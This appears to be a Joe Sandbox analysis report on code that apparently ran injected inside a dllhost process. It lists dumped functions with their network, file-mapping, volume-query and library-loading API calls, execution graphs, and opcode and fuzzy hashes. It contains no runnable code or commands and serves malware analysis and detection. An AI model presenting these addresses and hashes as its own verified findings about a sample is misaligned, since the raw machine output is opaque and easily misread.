                                                                                                                                                  Function 00007DF483A0199C Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 257nativeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.2987398812.00007DF483A01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF483A01000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_7df483a01000_wmprph.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InformationProcessQuery
                                                                                                                                                  • String ID: ($.$o
                                                                                                                                                  • API String ID: 1778838933-116743476
                                                                                                                                                  • Opcode ID: 4bc1349027c11bed1782b00e19f7c38053766996ee3beef85e27a3dd3919dec8
                                                                                                                                                  • Instruction ID: eaaaceab4efbc534b49354d84edce82864b371865195e8f366d1a5d50efd3177
                                                                                                                                                  • Opcode Fuzzy Hash: 4bc1349027c11bed1782b00e19f7c38053766996ee3beef85e27a3dd3919dec8
                                                                                                                                                  • Instruction Fuzzy Hash: A381803490C7D4CEE775AB6894283FBBBE1FF96300F141A2ED0DBC3292D62895858752

                                                                                                                                                  Execution Graph

                                                                                                                                                  Execution Coverage:2.2%
                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                  Total number of Nodes:133
                                                                                                                                                  Total number of Limit Nodes:4
                                                                                                                                                  execution_graph 13895 25c3f5d3478 13896 25c3f5d348b 13895->13896 13898 25c3f5d34e6 13896->13898 13899 25c3f5d4918 13896->13899 13900 25c3f5d493e 13899->13900 13901 25c3f5d46c4 closesocket 13900->13901 13902 25c3f5d4946 13900->13902 13901->13902 13902->13898 13801 25c3f5d2874 13802 25c3f5d288e 13801->13802 13803 25c3f5d2898 13802->13803 13804 25c3f5d2893 LoadLibraryA 13802->13804 13804->13803 13857 25c3f5d5454 13858 25c3f5d54c9 13857->13858 13860 25c3f5d546a 13857->13860 13858->13860 13861 25c3f5d53d4 13858->13861 13862 25c3f5d5416 13861->13862 13864 25c3f5d53d9 13861->13864 13862->13860 13863 25c3f5d5400 13863->13862 13871 25c3f5d46c4 13863->13871 13864->13863 13867 25c3f5f7854 13864->13867 13868 25c3f5f78a2 13867->13868 13869 25c3f5f7872 13867->13869 13868->13863 13869->13868 13875 25c3f5f92ec 13869->13875 13872 25c3f5d46d6 13871->13872 13874 25c3f5d46ef 13872->13874 13879 25c3f5d4634 13872->13879 13874->13862 13876 25c3f5f9307 13875->13876 13877 25c3f5f93fa closesocket 13876->13877 13878 25c3f5f940c 13876->13878 13877->13878 13878->13868 13880 25c3f5d464f 13879->13880 13881 25c3f5f78a2 13880->13881 13882 25c3f5f92ec closesocket 13880->13882 13881->13874 13882->13881 13939 25c3f5f9554 13940 25c3f5f955e 13939->13940 13941 25c3f5f9578 13939->13941 13940->13941 13943 25c3f5f7fe0 13940->13943 13946 25c3f5f7ef0 13943->13946 13945 25c3f5f8011 13945->13941 13947 25c3f5f7f14 socket 13946->13947 13949 25c3f5f7f2c 13946->13949 13948 25c3f5f7f47 13947->13948 13947->13949 13948->13949 13950 25c3f5f7b00 2 API calls 13948->13950 13949->13945 13950->13949 13809 25c3f5d2690 13812 25c3f5d28d4 13809->13812 13813 25c3f5d26a2 13812->13813 13814 25c3f5d28dd 13812->13814 13814->13813 13815 25c3f5d2944 SetErrorMode 13814->13815 13816 25c3f5d2955 13815->13816 13818 25c3f5d3970 13816->13818 13819 25c3f5d3991 13818->13819 13825 25c3f5d3ae9 13819->13825 13826 25c3f5d3544 13819->13826 13822 25c3f5d39c2 13822->13825 13830 25c3f5d376c 13822->13830 13823 25c3f5d3a5e 13824 25c3f5d3ad3 NtQuerySystemInformation 13823->13824 13823->13825 13824->13825 13825->13813 13827 25c3f5d356d 13826->13827 13828 25c3f5d3637 GetVolumeInformationW 13827->13828 13829 25c3f5d3672 13827->13829 13828->13829 13829->13822 13831 25c3f5d379e 13830->13831 13832 25c3f5d387e CreateFileMappingW 13831->13832 13833 25c3f5d38b8 MapViewOfFile 13832->13833 13834 25c3f5d38db 13832->13834 13833->13834 13834->13823 13835 25c3f5f7ef0 13836 25c3f5f7f14 socket 13835->13836 13838 25c3f5f7f2c 13835->13838 13837 25c3f5f7f47 13836->13837 13836->13838 13837->13838 13840 25c3f5f7b00 13837->13840 13841 25c3f5f7b32 13840->13841 13842 25c3f5f7b55 CreateIoCompletionPort 13841->13842 13844 25c3f5f7b3d 13841->13844 13843 25c3f5f7b6d 13842->13843 13843->13844 13845 25c3f5f7ba2 SetFileCompletionNotificationModes 13843->13845 13844->13838 13845->13844 13891 25c3f5d2ad2 13892 25c3f5d2ae7 13891->13892 13893 25c3f5d2b07 13892->13893 13894 25c3f5d46c4 closesocket 13892->13894 13894->13893 13911 25c3f5d2f2c 13914 25c3f5d2f46 13911->13914 13915 25c3f5d3043 13911->13915 13912 25c3f5d46c4 closesocket 13913 25c3f5d3041 13912->13913 13914->13913 13914->13915 13916 25c3f5d2fc9 13914->13916 13915->13912 13916->13913 13918 25c3f5d5ce8 13916->13918 13922 25c3f5d5d04 13918->13922 13925 25c3f5d5d86 13918->13925 13919 25c3f5d5d81 13919->13913 13920 25c3f5d5d79 13921 25c3f5d46c4 closesocket 13920->13921 13921->13919 13922->13920 13923 25c3f5d53d4 closesocket 13922->13923 13923->13922 13925->13919 13926 25c3f5d587c 13925->13926 13927 25c3f5d58c3 13926->13927 13931 25c3f5d594e 13926->13931 13928 25c3f5d58cc 13927->13928 13929 25c3f5d5b2c 13927->13929 13928->13931 13932 25c3f5d53d4 closesocket 13928->13932 13929->13931 13933 25c3f5d55e0 13929->13933 13931->13925 13932->13931 13934 25c3f5d560c 13933->13934 13935 25c3f5d4918 closesocket 13934->13935 13938 25c3f5d56b1 13934->13938 13936 25c3f5d5697 13935->13936 13937 25c3f5d53d4 closesocket 13936->13937 13936->13938 13937->13938 13938->13931 13955 25c3f5d330c 13956 25c3f5d3378 13955->13956 13957 25c3f5d331e 13955->13957 13957->13956 13959 25c3f5d5774 13957->13959 13960 25c3f5d5779 13959->13960 13962 25c3f5d579b 13959->13962 13961 25c3f5d55e0 closesocket 13960->13961 13960->13962 13961->13962 13962->13957 13853 25c3f5f92ec 13854 25c3f5f9307 13853->13854 13855 25c3f5f93fa closesocket 13854->13855 13856 25c3f5f940c 13854->13856 13855->13856 13963 25c3f5f95a4 13964 25c3f5f95d6 13963->13964 13965 25c3f5f95b3 13963->13965 13965->13964 13967 25c3f5f8024 13965->13967 13968 25c3f5f7ef0 3 API calls 13967->13968 13969 25c3f5f806d 13968->13969 13969->13964 13805 25c3f5d28a0 13806 25c3f5d28bc 13805->13806 13807 25c3f5d28ca 13806->13807 13808 25c3f5d28c1 GetProcAddressForCaller 13806->13808 13808->13807 13951 25c3f5d5540 13952 25c3f5d555e 13951->13952 13953 25c3f5d53d4 closesocket 13952->13953 13954 25c3f5d558a 13952->13954 13953->13954 13846 25c3f5f6f3c SetErrorMode 13847 25c3f5f6f50 13846->13847 13848 25c3f5fa516 socket 13847->13848 13849 25c3f5fa55a getsockopt 13848->13849 13850 25c3f5fa5a3 socket 13848->13850 13849->13850 13852 25c3f5fa5c3 13850->13852

                                                                                                                                                  Executed Functions

                                                                                                                                                  Function 0000025C3F5D3970 Relevance: 1.8, APIs: 1, Instructions: 269nativeCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001A.00000002.2982455286.0000025C3F5D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000025C3F5D0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_26_2_25c3f5d0000_dllhost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Information$QuerySystemVolume
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2187445334-0
                                                                                                                                                  • Opcode ID: e92f52f04fafdb8c987bb29090aa65ae1428b1b1263f5fb89cc43cd6609f3fd8
                                                                                                                                                  • Instruction ID: 084b79a1a7b333f48e8f2a49eb968ff66202d43adf015e53ac902c4f92695104
                                                                                                                                                  • Opcode Fuzzy Hash: e92f52f04fafdb8c987bb29090aa65ae1428b1b1263f5fb89cc43cd6609f3fd8
                                                                                                                                                  • Instruction Fuzzy Hash: 99919130214F0D8FE7A5EF24D8997EA73E1FB64302F204A7AA45BC31A1EE38D5458781
                                                                                                                                                  Function 0000025C3F5F6F3C Relevance: 6.1, APIs: 4, Instructions: 130networkCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001A.00000002.2982455286.0000025C3F5D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000025C3F5D0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_26_2_25c3f5d0000_dllhost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: socket$ErrorModegetsockopt
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 552242919-0
                                                                                                                                                  • Opcode ID: 5311ec3011ded2eede0a7d2498efd547664f48dd7a92f4cf7cf32dea49d33346
                                                                                                                                                  • Instruction ID: e0ba4b514e7a647f4d0dce2a4097d93ca63beee50927a012b60208f5993489d5
                                                                                                                                                  • Opcode Fuzzy Hash: 5311ec3011ded2eede0a7d2498efd547664f48dd7a92f4cf7cf32dea49d33346
                                                                                                                                                  • Instruction Fuzzy Hash: 13414370618B488FF748EF28DC9999A77E1FB99301F508A6DE047C32A5DF399504CB45
                                                                                                                                                  Function 0000025C3F5D376C Relevance: 3.2, APIs: 2, Instructions: 176fileCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001A.00000002.2982455286.0000025C3F5D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000025C3F5D0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_26_2_25c3f5d0000_dllhost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: File$CreateMappingView
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3452162329-0
                                                                                                                                                  • Opcode ID: 129d2077c0dcf1c5c8194996cfac5c2ad39c6d887897e6f38c829ad1dd2edd25
                                                                                                                                                  • Instruction ID: 63625e17f129ef8b1a8dba9bfb627fcf5ea4e16b89c6153afbffa15d64a7cfa0
                                                                                                                                                  • Opcode Fuzzy Hash: 129d2077c0dcf1c5c8194996cfac5c2ad39c6d887897e6f38c829ad1dd2edd25
                                                                                                                                                  • Instruction Fuzzy Hash: CB51A23151CB889FD725EF24C8867EAB7E0FB95302F10496FE4DAC2191EF3495058B92
                                                                                                                                                  Function 0000025C3F5F7B00 Relevance: 3.1, APIs: 2, Instructions: 117COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001A.00000002.2982455286.0000025C3F5D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000025C3F5D0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_26_2_25c3f5d0000_dllhost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Completion$CreateFileModesNotificationPort
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3755109111-0
                                                                                                                                                  • Opcode ID: 1a7c7af7fbac319b5ac74e973487f80961a512197179ac17f28a09199c0ed714
                                                                                                                                                  • Instruction ID: eb0a4347554f12c56c2889c0069ef8e5881fbd2efaa6728831ab85f5f14b2d10
                                                                                                                                                  • Opcode Fuzzy Hash: 1a7c7af7fbac319b5ac74e973487f80961a512197179ac17f28a09199c0ed714
                                                                                                                                                  • Instruction Fuzzy Hash: 65319230304F1C9FFB589B28ACD876932D5E755316FA099E9E847C2183FB39CC41869A
                                                                                                                                                  Function 0000025C3F5D3544 Relevance: 1.7, APIs: 1, Instructions: 168COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001A.00000002.2982455286.0000025C3F5D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000025C3F5D0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_26_2_25c3f5d0000_dllhost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InformationVolume
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2039140958-0
                                                                                                                                                  • Opcode ID: 71a7f780ae9fe7526399642dc629586b1db88638b38b934ddd42604476fc42bb
                                                                                                                                                  • Instruction ID: 382b708fad0049cf72039f4df009a0c5790064f64a964e44e2f4919331c3bfa8
                                                                                                                                                  • Opcode Fuzzy Hash: 71a7f780ae9fe7526399642dc629586b1db88638b38b934ddd42604476fc42bb
                                                                                                                                                  • Instruction Fuzzy Hash: E351207111CB888FD766EF24C8D56EBB7E1FB94301F504A6EA0CAC2291DF789505CB52
                                                                                                                                                  Function 0000025C3F5F92EC Relevance: 1.6, APIs: 1, Instructions: 145COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 173 25c3f5f92ec-25c3f5f9305 174 25c3f5f9307-25c3f5f930c 173->174 175 25c3f5f9331-25c3f5f9336 173->175 176 25c3f5f9320-25c3f5f932a call 25c3f5f9260 174->176 177 25c3f5f930e-25c3f5f931e 174->177 178 25c3f5f938a-25c3f5f939e 175->178 179 25c3f5f9338-25c3f5f9340 175->179 176->178 194 25c3f5f932c-25c3f5f932f 176->194 177->178 181 25c3f5f93c6-25c3f5f93cd 178->181 182 25c3f5f93a0-25c3f5f93ab 178->182 179->178 183 25c3f5f9342-25c3f5f934c call 25c3f5f9260 179->183 184 25c3f5f93f5-25c3f5f93f8 181->184 185 25c3f5f93cf-25c3f5f93da 181->185 182->181 189 25c3f5f93ad-25c3f5f93af 182->189 183->178 197 25c3f5f934e-25c3f5f9350 183->197 192 25c3f5f93fa-25c3f5f9407 closesocket 184->192 193 25c3f5f940c-25c3f5f9417 184->193 185->184 190 25c3f5f93dc-25c3f5f93de 185->190 189->181 195 25c3f5f93b1-25c3f5f93b4 189->195 190->184 196 25c3f5f93e0-25c3f5f93e3 190->196 192->193 198 25c3f5f9419-25c3f5f941d 193->198 199 25c3f5f941f-25c3f5f9423 193->199 194->178 195->181 200 25c3f5f93b6-25c3f5f93bd 195->200 196->184 201 25c3f5f93e5-25c3f5f93ec 196->201 202 25c3f5f9353-25c3f5f9363 197->202 198->199 203 25c3f5f9427-25c3f5f9436 198->203 199->203 200->181 204 25c3f5f93bf-25c3f5f93c3 200->204 201->184 205 25c3f5f93ee-25c3f5f93f2 201->205 206 25c3f5f9365-25c3f5f936d 202->206 207 25c3f5f937e-25c3f5f9388 202->207 208 25c3f5f9438-25c3f5f943e 203->208 209 25c3f5f9452-25c3f5f945c 203->209 204->181 205->184 206->207 210 25c3f5f936f-25c3f5f9376 206->210 207->178 207->202 208->209 211 25c3f5f9440-25c3f5f944f 208->211 210->207 211->209
                                                                                                                                                  APIs
                                                                                                                                                  • closesocket.WS2_32(?,?,?,?,00000001,?,?,0000025C3F5F790E), ref: 0000025C3F5F9401
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001A.00000002.2982455286.0000025C3F5D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000025C3F5D0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_26_2_25c3f5d0000_dllhost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: closesocket
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2781271927-0
                                                                                                                                                  • Opcode ID: 5543650828b91c9091ba2f5705f08a79c55bf69c5ca34b8a0067fb2e05718b7e
                                                                                                                                                  • Instruction ID: 0c00cfe28e0dea5e2612f0dd4b756eff9d3eb2059df0be631e68b32dd0ce3912
                                                                                                                                                  • Opcode Fuzzy Hash: 5543650828b91c9091ba2f5705f08a79c55bf69c5ca34b8a0067fb2e05718b7e
                                                                                                                                                  • Instruction Fuzzy Hash: AB514771510F499FFB98DF18CCC83A03394FB55366F605AD8D82ACA1C6E338C881CA84
                                                                                                                                                  Function 0000025C3F5F7EF0 Relevance: 1.6, APIs: 1, Instructions: 93networkCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001A.00000002.2982455286.0000025C3F5D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000025C3F5D0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_26_2_25c3f5d0000_dllhost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: socket
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 98920635-0
                                                                                                                                                  • Opcode ID: 447b7a408af3f987d6011d6f51ca6bdc25f1dc750359ee3063f4803dadd2e1cc
                                                                                                                                                  • Instruction ID: 1b696fe0f3f2cc086b3258157ff7334d06947fb1efc329930a03d9c0dbefa983
                                                                                                                                                  • Opcode Fuzzy Hash: 447b7a408af3f987d6011d6f51ca6bdc25f1dc750359ee3063f4803dadd2e1cc
                                                                                                                                                  • Instruction Fuzzy Hash: C0218B30314B089FF758AB78ACCD76533D1F754326F204AE9E85AC72D5EB389C418695
                                                                                                                                                  Function 0000025C3F5D28D4 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001A.00000002.2982455286.0000025C3F5D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000025C3F5D0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_26_2_25c3f5d0000_dllhost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorMode
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2340568224-0
                                                                                                                                                  • Opcode ID: 33ec6ddaf9085df90f8e5865b7bf906381379c38ccf4d9984dbe8e39deaa4d69
                                                                                                                                                  • Instruction ID: 42ac166e12db9fd01d40e971fa58d271082c0376a2056d4ed83f67ad837883bc
                                                                                                                                                  • Opcode Fuzzy Hash: 33ec6ddaf9085df90f8e5865b7bf906381379c38ccf4d9984dbe8e39deaa4d69
                                                                                                                                                  • Instruction Fuzzy Hash: AC016120316F0D2EFA59B3744CD937D22CAEB96217F6489A8B806D21D2FE3CC9054265
                                                                                                                                                  Function 0000025C3F5D28A0 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001A.00000002.2982455286.0000025C3F5D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000025C3F5D0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_26_2_25c3f5d0000_dllhost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressCallerProc
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2663294120-0
                                                                                                                                                  • Opcode ID: be8164fcd6bb8b439b0c6dd95cb79210c8cf986f476e4ea7066077b0df3d1665
                                                                                                                                                  • Instruction ID: 0cfb16e334cd281937bdf8742e956c3a36a1ef3bca9316e11b8006c33dee93b4
                                                                                                                                                  • Opcode Fuzzy Hash: be8164fcd6bb8b439b0c6dd95cb79210c8cf986f476e4ea7066077b0df3d1665
                                                                                                                                                  • Instruction Fuzzy Hash: 08E0C211705E0D1FBB6861AE288C67651C6C7DC27372442BBF41CC3295ED24CC4103A4
                                                                                                                                                  Function 0000025C3F5D2874 Relevance: 1.5, APIs: 1, Instructions: 24libraryCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 265 25c3f5d2874-25c3f5d2891 call 25c3f5d1994 268 25c3f5d2898-25c3f5d289e 265->268 269 25c3f5d2893-25c3f5d2896 LoadLibraryA 265->269 269->268
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001A.00000002.2982455286.0000025C3F5D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000025C3F5D0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_26_2_25c3f5d0000_dllhost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1029625771-0
                                                                                                                                                  • Opcode ID: deadc42d593f6e2d9e8bf000e5cc548490ab76c2dd2841c06e942c08cce04583
                                                                                                                                                  • Instruction ID: ed6ceb8024f9bd33bbc593fabb9fe646f4fa29f41ec228b644dc850f34e4f7bb
                                                                                                                                                  • Opcode Fuzzy Hash: deadc42d593f6e2d9e8bf000e5cc548490ab76c2dd2841c06e942c08cce04583
                                                                                                                                                  • Instruction Fuzzy Hash: 73D0A710321E0E2FEA48633D1CD837511C5E7DC22AF60557AB40AC2282E96CCC550314